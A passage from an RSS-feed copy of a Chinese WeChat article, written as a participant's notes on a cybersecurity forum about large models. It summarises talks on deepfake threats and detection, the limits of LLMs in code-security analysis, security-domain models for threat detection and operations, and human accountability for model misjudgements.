lang="x-none">威胁应对挑战</span></p><p style="margin:0in;font-size:12.0pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;" lang="zh-CN">- </span><span style="font-family:&#34;Segoe UI Emoji&#34;;" lang="x-none">📊</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="x-none">主题2：大模型与代码安全</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">LLM的能力边界</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">领域知识训练大模型</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">实证研究论文</span></p><p style="margin:0in;font-size:12.0pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;" lang="zh-CN">- </span><span style="font-family:&#34;Segoe UI Emoji&#34;;" lang="x-none">🔍</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="x-none">主题3：大模型与安全检测运营</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">Gartner：大模型重塑网络安全</span></p><p style="margin:0in;font-size:12.0pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;" lang="zh-CN">- </span><span style="font-family:&#34;Segoe UI Emoji&#34;;" lang="x-none">🔄</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="x-none">主题4：大模型飞轮</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;" lang="zh-CN">    - </span><span lang="x-none">机器人误判怎么办？</span></p><p style="margin:0in;font-size:12.0pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;color:black;" lang="zh-CN">- </span><span style="font-family:&#34;Segoe UI Emoji&#34;;" lang="x-none">⚔️</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="x-none"> 结语：观点碰撞，疑义相析</span></p><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"> </p></td></tr></tbody></table><h1 style="margin:0in;font-size:16.0pt;color:#14324D;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;">❤️</span><span style="font-family:&#34;微软雅黑 Light&#34;;">学习感悟</span></h1><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:#FA0000;">顺畅通达的科普，以及艰苦严谨的实证分析，是最宝贵的</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;">，可以让更多人正确理解新技术的应用场景、优势和局限。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">大模型在安全领域应用有能力边界，</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;color:#FA0000;" lang="zh-CN">领域知识是训练和改进大模型的基础</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">，依赖于领域知识的微调、语料库构建和上下文信息供给，是</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">R</span><span style="font-family:Calibri;font-size:11.0pt;" lang="zh-CN">AG</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">（</span><span style="font-family:Calibri;font-size:11.0pt;" lang="zh-CN">Retrieval-Augmented
     Generation</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">）模型训练和应用的核心步骤。</span></p></li></ul><h1 style="margin:0in;font-size:16.0pt;color:#14324D;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;">🌟</span><span style="font-family:&#34;微软雅黑 Light&#34;;">论坛亮点</span></h1><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">居然有这么顺溜的科普</h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">交大王士林院长的演讲主题是深度伪造技术，内容系统丰富，覆盖了语音、图像、视频等</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">多模态领域</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">，案例直观有趣，语言简洁通俗。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">作为学界研发前沿技术,是支撑业界实际应用的重要上游，王院长概括梳理了深度伪造技术的各个关键环节,并阐述了这些技术通过正向生成和逆向检测的相互制衡机制。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">他的演讲深入浅出,让我们对该领域的技术发展及应对之道</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">既知其然又知其所以然</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">，在轻松愉悦的氛围完成一次体验很棒的科普。</span></p></li></ul><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">有同行举着火把在帮大家探路</h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">蜚语科技</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="en-US">CEO</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">束骏亮的演讲主题是</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;" lang="zh-CN">软件供应链安全</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:
     12.0pt;color:black;" lang="zh-CN">，这个细分领域也是我正在深耕的，当然我也纠结在翻越过陡峭的学习曲线之后，会不会被大模型颠覆。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">大模型能不能、适不适合做代码分析和漏洞分析？束博士根据很严谨的实验设计，做了</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;" lang="zh-CN">大量的实证研究</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:
     12.0pt;color:black;" lang="zh-CN">，得出多个维度的结果分析，即大模型</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="en-US">针对Benchmark</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">样本以及</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="en-US">真实</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">生产</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="en-US">代码</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">的</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="en-US">分析，</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">目前</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="en-US">噪音太多,</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;" lang="zh-CN">存在能力边界。这种艰苦而严谨的基础性工作，对在业界同仁很有价值，他们的相关的论文已经发表。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">束博士也针对性地开发了两款产品以优化模型效果，已发布开源社区版。</span></p></li></ul><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">安全垂直领域大模型的光环</h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">深信服吴昌坤吴总介绍了</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">安全垂直领域已经备案</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">的大模型，分享大模型在未知威胁检测、防钓鱼、数据分类分级、开发安全、辅助运营的应用案例。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">吴总还现场回答了大家感兴趣的私有化大模型落地经验、模型</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">如何进化</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">、</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">语料库</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">来源及竞争态势等问题。</span></p></li></ul><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">网络安全要重视大模型飞轮</h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">奇安信的刘园园作为美女讲者，亲和力强，让现场与会者爽朗开怀大笑之余，也感觉</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">大模型后生可畏</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">刘经理以告警疲劳、效率瓶颈、专家稀缺入手，阐述</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">行业未来</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">在于“用大模型推动企业安全能力提升，用企业安全能力提升推动行业安全防御体系进一步发展，用行业反哺模型发展<span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 16px;letter-spacing: 0.578px;text-wrap: wrap;">”</span>的大模型飞轮。</span></p></li></ul><h1 style="margin:0in;font-size:16.0pt;color:#14324D;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;" lang="zh-CN">🎭</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">主题</span><span style="font-family:Calibri;" lang="en-US">1</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">：</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="en-US">深度伪造技术 </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">交大</span><span style="font-family:
Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="en-US">王士林</span></h1><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">深度伪造的影响领域</h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">政治</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">安全：</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">可生成虚假政治人物言论视频</span><span style="font-family:Calibri;font-size:11.0pt;" lang="zh-CN">,</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">如让</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">奥巴马唱我爱我的祖国</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">金融安全：</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">换脸骗取转账，</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">实时换脸，换语音</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">。“</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">老总</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">”</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">打微信视频电话</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">叫财务</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">转账</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">的真实案例</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">隐私安全：</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">平台默认规则包含”</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">允许自己的脸给别人用</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">“；可</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">攻破活体认证系统</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">，</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">检测工具主要在学界，商用比较少。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;">肖像安全：直播用明星的脸</span></p></li></ul><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;"><span lang="en-US">技术</span><span lang="zh-CN">分类及威胁等级</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;">全脸生成，静态，问题不大</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">属性修改，</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">如：</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">带墨镜</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">面部替换，威胁大，</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">因为</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">背景不变。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">表情重现，威胁最大，可以说任何东西。</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">门槛不高，软件用</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">deep face live</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">，</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US"> </span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">硬件</span><span style="font-family:Calibri;font-size:11.0pt;" lang="en-US">2080</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">显卡就可以</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="zh-CN">了</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:11.0pt;" lang="en-US">。</span></p></li></ul><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">技术原理</h2><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000240" data-ratio="0.5611111111111111" data-type="png" data-w="1080" height="334" width="596" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=b7a0157f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzjP65vJM9ahE3Kx8lm98ANZZQeQKTuA27ibKqNIqVDUppHVyqsicjAjBvbdkEuMMWHeE8fqa6ibxzpQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">我简单理解，深度伪造不是传统的物理和数字的数字孪生，是数字对数字的数字孪生，而且是双向的孪生，能参照生成，也能检测区分。</p><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">法律法规</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;"><span lang="en-US">任何组织和个人不得采用技术手段删除、篡改</span><span lang="zh-CN">、</span><span lang="en-US">隐匿深度合成数据和技术相关标识。</span></p><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">威胁应对挑战</h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">高对抗性，针对现有防御的特定攻击</p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;">高泛化性要求，与时俱进的深度伪造技术，差异化的内容和细微的生成痕迹</p></li></ul><h1 style="margin:0in;font-size:16.0pt;color:#14324D;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;" lang="zh-CN">📊</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">主题</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="en-US">2</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">：</span><span style="font-family:Calibri;" lang="en-US">LLM</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="en-US">在代码安全领域的应用探索与落地 蜚语</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">科技</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="en-US">束骏亮</span></h1><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
Calibri;" lang="en-US">LLM</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">的能力边界</span></h2><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:Calibri;" lang="en-US">LLM</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">在代码安全领域的应用有</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="en-US">能力边界</span><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">，和传统分析方法效果区别明显。</span></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000237" data-ratio="0.47416762342135477" data-type="png" data-w="871" height="275" width="580" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ce91664d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzjP65vJM9ahE3Kx8lm98ANUN5VaicHsuJKR7rFF7ODOPbLH9WAFM5WNuqn4J6ticqdFicWDlBbpXOicg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000236" data-ratio="0.5639269406392694" data-type="png" data-w="876" height="338" width="599" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ac6e45c4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzjP65vJM9ahE3Kx8lm98ANPC7kH51hcW16IN6ncxCbOSejQYrkb9NtZbfdw5SYicZoZLZ63aB2cXg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">领域知识必不可少，大模型可以降低门槛</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: black;"><span lang="zh-CN">会后请教了束总关于语法树特征提取和分析与大模型的关系，以及蜚语安全两个产品的微调</span><span lang="en-US">/RAG</span><span lang="zh-CN">和程序行为数据的表达，束总直观解释机理，并表示领域知识是训练的基础，大模型可以降低后续规则应用的复杂性。</span></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000238" data-ratio="0.48085585585585583" data-type="png" data-w="888" height="284" width="591" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=bd8d3498&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzjP65vJM9ahE3Kx8lm98ANWHgjfmlL5cia6SHHPWomf11d4lsgT5QMYEPE0ibTktGicJBCic5v5gGGmQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000239" data-ratio="0.5187287173666288" data-type="png" data-w="881" height="304" width="587" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=33b25706&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzjP65vJM9ahE3Kx8lm98AN9hpPtxia1lVcJaCH0eukaZgLbxZgKX7Ogw6ZsboEicYS6QMLh0bNtA6Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;">实证研究和开源产品</h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-right: 0in;margin-left: 0in;font-family: Calibri;font-size: 11pt;">Wu F, Zhang Q, Bajaj
A P, et al. Exploring the Limits of ChatGPT in Software Security
Applications[J]. arXiv preprint arXiv:2312.05275, 2023</p></li><li><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">蜚语的开源版，</span><span style="font-family:Calibri;" lang="zh-CN"><a href="https://github.com/Feysh-Group/corax-community" target="_blank">https://github.com/Feysh-Group/corax-community</a></span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">，专门做</span><span style="font-family:
Calibri;" lang="zh-CN">java</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">高精度分析的，可以自定义规则，先加</span><span style="font-family:Calibri;" lang="en-US">star</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">再学习。</span></p></li></ul><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;" lang="zh-CN">🔍</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">主题</span><span style="font-family:Calibri;" lang="en-US">3</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">：</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="en-US">大模型重新定义安全检测与安全运营 </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">深信服</span><span style="font-family:
Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="en-US">吴昌坤</span></h1><h2 style="margin:0in;font-size:14.0pt;color:#276296;"><span style="font-family:
Calibri;" lang="en-US">Gartner</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">：大模型重塑网络安全</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;">组织将受益于生成式网络安全人工智能，因为它可以提高效率并缩短对网络安全风险和威胁的响应时间</p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;">网络安全供应商可以利用生成式网络安全人工智能来改进现有的工作流程，开展安全分析，生成安全配置或真实的攻击数据。很快，自动化值守能力将出现，可以自主基于高级指引运行，而不需要频繁提示对话。</p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000241" data-ratio="0.5575826681870011" data-type="png" data-w="877" height="329" width="591" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=9ff6368f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzjP65vJM9ahE3Kx8lm98AN09Q69NTXt4LicKBOqiaZkfRGJa27VVXz6Pf9133RJrPB4LZO7Pm3WknA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;" lang="zh-CN">🔄</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">主题</span><span style="font-family:Calibri;" lang="en-US">4</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">：</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="en-US">寻找网络安全的大模型飞轮 </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">奇安信</span><span style="font-family:
Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="en-US">刘圆圆</span></h1><h2 style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:14.0pt;color:#276296;" lang="en-US">机器人误判怎么办？</h2><p style="margin-right: 0in;margin-left: 0in;font-family: &#34;微软雅黑 Light&#34;;font-size: 11pt;">大模型的应用需要人机配合，确保最终判断符合专业标准，但<span style="color:#FA0000;">谁对模型输出结果负责</span>还是一个开放性的问题。</p><h1 style="margin:0in;font-size:16.0pt;color:#14324D;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;">⚔️</span><span style="font-family:&#34;Microsoft YaHei&#34;;">结语：观点碰撞，疑义相析</span></h1><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;">在网络安全垂直细分领域，大模型仍处于比较前沿的探索阶段，先期也只能找到科研院所，安全厂商这些“早鸟”，分享他们对大模型能力的不同看法和支撑数据。</span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;">组织方行业网络安全创新实验室期待未来随着大模型在行业的推广应用，能有更多甲方能分享他们在实践中的经验，因为他们更接近深层次的需求，能促进更深入的讨论。</span><span style="font-family:&#34;微软雅黑 Light&#34;;"></span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><span style="font-family:&#34;微软雅黑 Light&#34;;">观点共碰撞，疑义相与析，理性而开放的技术交流</span><span style="font-family:Calibri;">,</span><span style="font-family:&#34;微软雅黑 Light&#34;;">正是行业进步的动力。</span></p><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000242" data-ratio="0.6660447761194029" data-type="png" data-w="1072" height="399" width="600" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=13dd79ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzjP65vJM9ahE3Kx8lm98ANiaraFsm1M0QOicmHn9hazFpGoUZb8tB5Usl9GI3ib7nfDrtZeZhMJFJWA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483893">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=c635d2d7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483893%26idx%3D1%26sn%3D4e428bb0f9a2e45aa384295f45409c7d%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 25 Jan 2024 11:03:00 +0800</pubDate>
    </item>
    <item>
      <title>碰撞、交融与创新的盛宴 - 华泰证券第二届工业软件论坛笔记</title>
